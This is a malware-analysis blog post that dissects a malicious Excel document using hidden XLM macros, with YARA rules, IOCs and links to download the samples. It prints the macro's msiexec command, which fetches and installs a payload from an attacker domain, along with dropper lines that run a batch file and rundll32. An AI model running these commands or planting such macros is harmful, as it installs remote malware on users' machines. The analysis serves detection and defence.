Extracting "Sneaky" Excel XLM Macros
In this article, we present our in-depth analysis of a malicious Microsoft Excel document (.xlm format) that we found in the wild. We show how existing open source tools can be utilized to carve out interesting artifacts. During our analysis, we also point out some tool limitations and present our solution to closing the gap. Ultimately, our goal is to orchestrate the carving of as many artifacts as possible, for robust threat detection and prevention.
The sample we’ll dive into originally popped up on our RADAR a few weeks ago, just around the new year. Received through one of our VirusTotal Intelligence YARA hunt rules that search for suspicious Microsoft Office documents. The initial sample and some relevant reports:
- SHA256: 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
- Multi-AV: VirusTotal
- Sandbox detonation: Hybrid-Analysis
- Downloadable Samples
Initial AV detection was rather low (3/59), we’ll see why when we dive into the analysis. As of the time of this blogs publish, 30 days have passed and the file has been rescanned 6 times, resulting in a total of 9 out of 59 engines successfully detecting the threat.
A Cursory Glance
First, we open the XLS file with Microsoft Excel in a virtual environment to see what it looks like to an end-user. This Excel file contains a single spreadsheet, and the spreadsheet contains a single image that instructs the reader to click “Enable content” in order to view/edit the document (Fig 1); this is a common social engineering attempt to entice the user into allowing execution of the first stage of the malware payload:
Note that the social engineering component alone of this document lure is enough to trigger InQuest threat prevention. In this particular case through the Optical Character Recognition (OCR) layer of our Deep File Inspection® (DFI) stack.
Let’s use the popular oledump and olevba Python scripts, to examine whether the XLS file contains any VBA macros:
$ olevba3 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:-------- 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
===============================================================================
FILE: 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
Type: OLE
No VBA macros found.
$ oledump.py 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
1: 4096 'x05DocumentSummaryInformation'
2: 4096 'x05SummaryInformation'
3: 173064 'Workbook'
According to both tools, the document seemingly doesn’t contain any VBA macros. Note that oledump can leverage an additional plugin to dive deeper into the file, more on this later. To further investigate the file, we’ll employ the help of a Windows GUI tool for Structure Storage View SSView and a hex editor, in this case Hexinator.
A Deeper Dive
XLS is a Compound Document File (CDF or CF) or Object Linking and Embedding (OLE) File; thus, it can be explored with any OLE/CF viewer such as SSView. OLE files are hierarchical data structures consisting of several storages and streams, analogous to folders and files on your standard file system. Fig 2 shows the structure of this particular XLS file in SSView. In this file, the Workbook stream is interesting as it contains all the information related to this workbook such as the included sheets. The structure of this stream is fully specified in Microsoft Office Excel 97-2007 – Binary File Format Specification. We dump the Workbook stream to the filesystem by right-clicking on its name and then selecting “Save stream …”.
Note that we can also use 7zip to extract all storages and streams from an OLE compound file. 7zip creates a folder and a file for each relevant storage and stream parsed out of the compound file. We pull the extracted Workbook stream into our hex editor, and can spot a cmd.exe pivot at offset 0x028ABB as depicted in Fig 3.
Why the pivot through msiexec.exe? It’s one of a myriad of “Living off the Land” (LOL) techniques that attackers employ to mask their activitiy from runtime endpoint security monitoring tools. For a well maintained list of LOL binaries and libraries, see the LOLBAS project… they have a section dedicated to msiexec. The serf=19
bit is interesting, see the relevant documentation in the MSDN article for Custom Action Type 19. This makes for a good hunt rule on its own. We’re looking for serf=19
specifically, or any other serf=
and an URL prefix of http
:
// see: https://github.com/InQuest/yara-rules/
rule MSIExec_Pivot
{
strings:
$serf19 = "serf=19" nocase ascii wide
$msiserf1 = "msiexec" nocase ascii wide
$msiserf2 = "serf=" nocase ascii wide
$msiserf3 = "http" nocase ascii wide
condition:
$serf19 or all of ($msiserf*)
}
Before shifting focus to the actual MSI file that the msiexec pivots to, let’s take a brief look at the domain office365advance[.]com. It was only registered recently, a few days before the sample in question was first seen on Virus Total. The resolving IP address geo locates to Russian and appears to host another domain as well:
Domain | IP | Registration Date | Location |
---|---|---|---|
office365advance[.]com | 185.68.93.84 | 12/26/2018 | Russia |
krontvhouse[.]com | 185.68.93.84 | 2014 | Russia |
Further pivots can be made to uncover other related infrastructure, we leave this as an exercise for the reader and instead next examine the MSI installer which is retrieved from this domain. The MSI file has a SHA256 hash of a5bc8c8b89177f961aa5c0413716cb94b753efbea1a1ec9061be53b1be5cd36a and was initially uploaded to Virus Total on the same day that office365advance[.com] was registered. Initial detection was a meager 2 detection… today, 36 AV vendors properly detect this file as malicious. A simple string analysis on the MSI reveals the URL www.exetomsi.com, which contains a free tool to convert executable files (.exe) to an MSI installer. Turns out, this is a valuable hunting rule as well, we’ve been watching the results for a while and there’s plenty of other malware authors converting their payloads to MSI using this tool:
// see: https://github.com/InQuest/yara-rules/
rule Executable_Converted_to_MSI
{
strings:
$magic = /^xD0xCFx11xE0xA1xB1x1AxE1x00x00x00/
$url = "www.exetomsi.com" nocase
condition:
$magic at 0 and $url
}
Obviously, this string is easily bleached and thus this signature is easily evaded. Finer selected heuristics will provide a more robust hunt rule, again left as an exercise for the reader.
The MSI file in turn contains a malicious binary (c354467ec5d323fecf94d33bc05eab65f90a916c39137d2b751b0e637ca5a3e4). Upon its execution, it drops a VBS script (rds.vb, 8a5041d41c552c5df95e4a18de4c343e5ac54845e275262e99a3a6e1a639f5d4), a Batch file (help.bat, 91237a76e43caa35e3fbd42d47fbaca5d6b5ea7a96c89341196d070b628122ce), and Windows DLL library (htpd.dat, 79a56ca8a7fdeed1f09466af66c24ddef5ef97ac026297f4ea32db6e01a81190). The VBS script simply executes the dropped help.bat
file via a WScript.Shell
pivot:
# RDS.VB
CreateObject("WScript.shell").run "cmd /c %temp%help.bat", 0, False
The executed batch file in turn pivots to the dropped DLL by way of rundll32.exe. Note the entry point of the DLL here is bogus()
:
# HELP.BAT
rundll32.exe C:UsersZGSPBU~1AppDataLocalTemphtpd.dat, bogus
The DLL was also uploaded to Virus Total on 12/26/18, the date of the domain registration. Initial detection was at 4, whereas today, the majority of AV engines (46) successfully detect the DLL as malicious. Unfortunately this is the end of the line for our investigation. As of the time of research, htpd.dat:bogus()
attempts to retrieve a next-stage payload from one unreachable and another unregistered server. We’ve made public a Joe Sandbox Detonation Report for your perusal.
Within that report we can see two possible domains for next-stage retrieval:
URL | Status |
---|---|
hxxps://vesecase[.]com/support/form.php | Offline |
hxxps://afsssdrfrm[.]pw/support/form.php | Unregistered |
Peering back into the history of the registered, but currently offline domain, we can see that as of 12/20/2018 vesecase[.]com was hosting a default Apache Ubuntu install page:
Macroless Command Execution?
What of the original pivot though? How does the Excel malware lure transition from the user’s enabling of active content, to the cmd.exe / msiexec combination? It turns out the active content resides within an XLM macro, an age old technology that is giving AV some grief as of late. These kinds of techniques appear from time to time. Collating documents through capture (data-in-motion) and aggregation (data-at-rest) into the InQuest platform empowered by Deep File Inspection (DFI) provides threat hunting teams with an analysis tool to discover previously undiscovered and targeted threats… just like this.
To discover the answer, we’ll take an ever deeper look at the Workbook stream, which is in the BIFF8 format. First, we’ll take an interactive look with the Windows tool BIFFView++. As it is depicted in figures 4 and 5, the msiexec command is found within a Cell Formula (6h) record. That record is contained within the very first cell of the spreadsheet, A1 (column ‘A’, row ‘1’).
Now, we need to determine the sheet that contains this particular cell formula. According to the XLM Spec, all information about a sheet such as its name, type, and stream position are kept within a BOUNDSHEET record (85h). In Fig 6. we can see that this workbook has two BOUNDSHEET records; which means it has two sheets. However, one of them must be hidden as we can only see one sheet in Fig 1.
The first sheet starts at offset 0x028938 and the second one at offset 0x028C17. The cell formula that we are interested in is located at 0x028ABB; this means that this cell is in the first sheet; which is a hidden macro sheet. We can unhide the sheet by either setting the hidden state to zero within the file, or toggling the setting through the Excel interface. It is interesting to note that the hidden state can also be set to 2; which is called very hidden state. Very hidden sheets cannot be unhidden through the Excel interface, they can only be toggled to visible via manual hex editing of the file. After unhiding the macro sheet, we can see the embedded macro clearly in the Excel GUI.
This formula is triggered when the document is opened (Auto_Open label points to cell A1), the user is asked to enable active content, and then the cmd.exe/msiexec and subsequent chain of events are automatically executed. As mentioned earlier, XLM 4.0 macros are an arcane technology that predate VBA even (which was introduced in Excel 5.0).
We’re afforded yet another hunting opportunity here. The following YARA rule will detect Excel files with both hidden and very hidden macro sheets. Please note that not all XLM files with hidden Macro sheets are malicious.
// see: https://github.com/InQuest/yara-rules/
rule Excel_Hidden_Macro_Sheet
{
strings:
$ole_marker = {D0 CF 11 E0 A1 B1 1A E1}
$macro_sheet_h1 = {85 00 ?? ?? ?? ?? ?? ?? 01 01}
$macro_sheet_h2 = {85 00 ?? ?? ?? ?? ?? ?? 02 01}
condition:
$ole_marker at 0 and 1 of ($macro_sheet_h*)
}
To programmatically extract XLM macros from an Excel Workbook, we can lean on the BIFF plugin that is bundled with @DidierStevens oledump tool. This plugin recognizes a number of functions such as EXEC, REGISTER, and HALT. First, let’s explore the BIFF objects by count:
# BIFF dump, sorted by record type popularity, with partial annotations.
$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 | tr -s ' ' | cut -d' ' -f4 | sort | uniq -c | sort -nr
63 XF # Extended Format 5.115
47 STYLEEXT
47 STYLE
42 ROW
41 XFEXT
40 MULBLANK
20 FORMAT
17 CONTINUE # record code=3C00XXXX (typically 3C002020 for record size)
3 EOF
3 DBCELL
3 BOF
2 WSBOOL
2 WINDOW2
2 VCENTER
2 TOPMARGIN
2 SETUP
2 SELECTION
2 SAVERECALC
2 RIGHTMARGIN
2 REFMODE
2 PRINTHEADERS
2 PRINTGRIDLINES
2 PLV
2 MSODRAWINGGROUP # code=eb002020 this is where your images are.
2 MSODRAWING # related
2 LEFTMARGIN
2 ITERATION
2 INDEX
2 HEADERFOOTER
2 HEADER
2 HCENTER
2 GUTS
2 GRIDSET
2 FORMULA # EXEC, HALT, etc. the macro content
2 FOOTER
2 FEATHEADR
2 DIMENSIONS
2 DELTA
2 DEFCOLWIDTH
2 DEFAULTROWHEIGHT
2 COLINFO
2 CALCMODE
2 CALCCOUNT
2 BOUNDSHEET # Spreadsheets
2 BOTTOMMARGIN
1 plugin
1 XFCRC
1 WRITEACCESS
1 WINDOWPROTECT
1 WINDOW1
1 USESELFS
1 THEME
1 TABLESTYLES
1 TABID
1 SUPBOOK
1 SST
1 REFRESHALL
1 RECALCID
1 PROTECT
1 PROT4REVPASS
1 PROT4REV
1 PRECISION
1 PLS
1 PASSWORD
1 OBJ
1 MTRSETTINGS
1 MMS
1 MERGECELLS
1 LABEL # This record represents a cell that contains a string.
1 INTERFACEHDR
1 INTERFACEEND
1 HIDEOBJ
1 HFPicture
1 FORCEFULLCALCULATION
1 FNGROUPCOUNT
1 EXTSST
1 EXTERNSHEET
1 EXCEL9FILE
1 DSF
1 COUNTRY
1 COMPRESSPICTURES
1 COMPAT12
1 CODEPAGE
1 BOOKEXT
1 BOOKBOOL
1 BACKUP
1 1904
If you’re looking for “interesting” records, start with grepping for the “sheet”, “label”, and “formula”. Let’s look for the Auto_Open
label and dump it, to find the cmd/msiexec combination:
$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-o label -s"
1: 4096 'x05DocumentSummaryInformation'
2: 4096 'x05SummaryInformation'
3: 173064 'Workbook'
Plugin: BIFF plugin
'0018 31 LABEL : Cell Value, String Constant - x00Auto_Ope'
ASCII:
Auto_Open:
002a 2 PRINTHEADERS : Print Row/Column Labels
002a 2 PRINTHEADERS : Print Row/Column Labels
$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-o formula"
1: 4096 'x05DocumentSummaryInformation'
2: 4096 'x05SummaryInformation'
3: 173064 'Workbook'
Plugin: BIFF plugin
0160 2 USESELFS : Natural Language Formulas Flag
'0006 129 FORMULA : Cell Formula - R1C1 107 ptgStr "msiexec.exe serf=19 skip=1 /i http://office365advance.com/update /q OnStart='c:\windows\notepad.exe'" ptgFuncVarV args 1 func 006e (EXEC) '
0006 26 FORMULA : Cell Formula - R2C1 4 ptgFuncVarV args 0 func 0036 (HALT)
Next, let’s take a look at how one could programmatically carve the image component out of the document lure.
Carving Images from XLM
As mentioned in the beginning, our aim is to carve as much as possible from this file. Thus, we are also interested in extracting the image embedded in this document. This is a precursor to extracting the semantic meaning through Optical Character Recognition (OCR). Common choices to accomplish this task generically include forensic tools such as foremost and scalpel. We’ll show an example of using scalpel here. However, neither provides a copy with the same fidelity as what is originally displayed upon opening the Excel document in a virtual machine:
# applicable scalpel rules:
# GIF and JPG files (very common)
# gif y 5000000 x47x49x46x38x37x61 x00x3b
# gif y 5000000 x47x49x46x38x39x61 x00x00x3b
# jpg y 200000000 xffxd8xffxe0x00x10 xffxd9
# jpg y 200000000 xffxd8xffxe1 xffxd9
$ scalpel -c /etc/scalpel.conf 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526/workbook
Fig. 9 shows the output of the carved file by scalpel in the default image viewer on Windows 10.
Why is the file corrupted? Within the XLS/BIFFv8 format, records have a maximum size of 8,228 bytes. If the size of data is greater than what can fit in a single record, then the data must be split into chunks. The first chuck is put in the first record, and the rest of data chunks are placed in subsequent CONTINUE (3Ch) records. To successfully extract images from XLM files, one needs to strip these CONTINUE headers from the extracted image. To accomplish this task automatically, we’ve extended the oledump BIFF plugin (plugin_biff.py) to include a new command line switch for extracting images. You can find our patch in our Github repository (lines 570 to 603):
https://github.com/InQuest/DidierStevensSuite/blob/BIFF-Image-Dump-Switch/plugin_biff.py#L570-L592
Here it is in action:
$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-h"
Usage: oledump.py [options]
Options:
-h, --help show this help message and exit
-e, --extract Extract images
-s, --strings Dump strings
-a, --hexascii Dump hex ascii
-o OPCODE, --opcode=OPCODE
Opcode to filter for
-f FIND, --find=FIND Content to search for
$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-e"
1: 4096 'x05DocumentSummaryInformation'
2: 4096 'x05SummaryInformation'
3: 173064 'Workbook'
Plugin: BIFF plugin
00003255 0866 126 HFPicture : Header / Footer Picture
00005279 00eb 8224 MSODRAWINGGROUP : Microsoft Office Drawing Group
[EB] image + 8107 = 8107 bytes
0000729d 00eb 8224 MSODRAWINGGROUP : Microsoft Office Drawing Group
[EB] image + 8224 = 16331 bytes
000092c1 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 24555 bytes
0000b2e5 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 32779 bytes
0000d309 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 41003 bytes
0000f32d 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 49227 bytes
00011351 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 57451 bytes
00013375 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 65675 bytes
00015399 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 73899 bytes
000173bd 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 82123 bytes
000193e1 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 90347 bytes
0001b405 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 98571 bytes
0001d429 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 106795 bytes
0001f44d 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 115019 bytes
00021471 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 123243 bytes
00023495 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 131467 bytes
000254b9 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 139691 bytes
000274dd 003c 8224 CONTINUE : Continues Long Records
[3C] image + 8224 = 147915 bytes
00027c6f 003c 1934 CONTINUE : Continues Long Records
[3C] image + 1934 = 149849 bytes
Conclusion
In this article, we analyzed a stealthy malicious Excel document that relies on XLM macros to run embedded commands; which is an old-age technology superseded by VBA. We provided in detail on how such macros can be located in XLM binary files and also how to carve other useful information such as image files. Last not least, we also presented three YARA rules that can be used to capture malware instances that use similar technique.
If you’re interested in a similar sample, take a look at:
- VT: 6f807662e04b5cfb85bc892e27a29994ddcf78e7c3311581753761fede3d5bd1
- Pivot: add3565office[.]com/rstr
- Final: pointsoft[.]pw
Malware Samples (All Stages)
Note: The following contain links to actual malware. Though without file extensions, care should be taken. Not everyone has access to Virus Total, and we want to ensure that samples are available freely for all researchers to improve their trade craft.
Stage | Parent Process | File Type | Name | SHA256… | Download |
---|---|---|---|---|---|
1 | EXCEL | XLS | 98e4695e… | download | |
2 | MSIEXEC | MSI | a5bc8c8b… | download | |
3 | MSIEXEC | EXE | c354467e… | download | |
4 | WSCRIPT | VBS | rds.vbs | 8a5041d4… | download |
5 | CMD | BAT | help.bat | 91237a76… | download |
6 | RUNDLL32 | DLL | htpd.dat | 79a56ca8… | download |
YARA Hunting Rules
The YARA rules we defined inline above are available, along with other YARA rules we wish to share with the community. These rules should not be considered production appropriate. Rather, they are valuable for research and hunting purposes:
Other YARA rules that we’ve open-sourced can be found at https://github.com/InQuest/yara-rules/. Additionally, we maintain a curated list of awesome YARA rules, tools, and people over at: https://github.com/InQuest/awesome-yara/.
References
- https://blog.inquest.net/blog/2018/02/12/deep-file-inspection
- http://download.microsoft.com/download/1/A/9/1A96F918-793B-4A55-8B36-84113F275ADD/Excel97-2007BinaryFileFormat(xls)Specification.pdf
- https://www.openoffice.org/sc/excelfileformat.pdf
- https://msdn.microsoft.com/en-us/library/dd942138.aspx
- https://www.mitec.cz/ssv.html
- https://www.aldeid.com/wiki/BiffView
- https://lolbas-project.github.io/lolbas/Binaries/Msiexec/
- https://github.com/decalage2/oletools
- https://blog.didierstevens.com/programs/oledump-py/
- http://www.exetomsi.com
- https://research.domaintools.com/research/screenshot-history/vesecase.com/#0
- http://whois.domaintools.com/vesecase.com
- http://whois.domaintools.com/office365advance.com
IOCs
- 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
- a5bc8c8b89177f961aa5c0413716cb94b753efbea1a1ec9061be53b1be5cd36a
- c354467ec5d323fecf94d33bc05eab65f90a916c39137d2b751b0e637ca5a3e4
- 8a5041d41c552c5df95e4a18de4c343e5ac54845e275262e99a3a6e1a639f5d4
- 91237a76e43caa35e3fbd42d47fbaca5d6b5ea7a96c89341196d070b628122ce
- 79a56ca8a7fdeed1f09466af66c24ddef5ef97ac026297f4ea32db6e01a81190
- office365advance[.]com
- hxxp://office365advance[.]com/update
- krontvhouse[.]com
- 185.68.93.84
- vesecase[.]com
- hxxps://vesecase[.]com/support/form.php
- afsssdrfrm[.]pw
- hxxps://afsssdrfrm[.]pw/support/form.php
- add3565office[.]com
- add3565office[.]com/rstr
- pointsoft[.]pw
Free On-Demand Webinar: Think Before You Click
Whether sent as an email attachment, sitting in your cloud or traversing the Web, file-borne threats have become a proven favorite for delivering malware and phishing campaigns. View our webinar on-demand and get firsthand tips about how to safeguard your cybersecurity stack with File Detection and Response (FDR) and stop file-borne threats in their tracks.